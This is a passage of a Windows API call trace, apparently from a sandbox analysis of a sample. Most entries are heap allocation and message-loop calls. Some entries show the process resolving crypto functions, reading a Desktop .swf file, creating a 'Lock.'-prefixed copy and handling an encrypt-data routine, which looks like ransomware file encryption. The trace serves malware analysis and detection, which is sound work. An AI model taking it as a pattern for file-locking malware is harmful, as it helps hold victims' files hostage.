HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0210.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0210.182] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.182] CryptDestroyHash (hHash=0xa87590) returned 1 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0210.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0210.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0210.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/WaYoUsnM2UCIentbe.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wayousnm2ucientbe.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0210.188] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.188] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0210.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.188] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0210.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.WaYoUsnM2UCIentbe.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.wayousnm2ucientbe.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0210.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.194] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.194] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x5963, lpOverlapped=0x0) returned 1 [0210.196] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.199] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.199] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.199] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.200] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5963) returned 0x2f24018 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5963) returned 0x2f2f2f8 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0210.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, 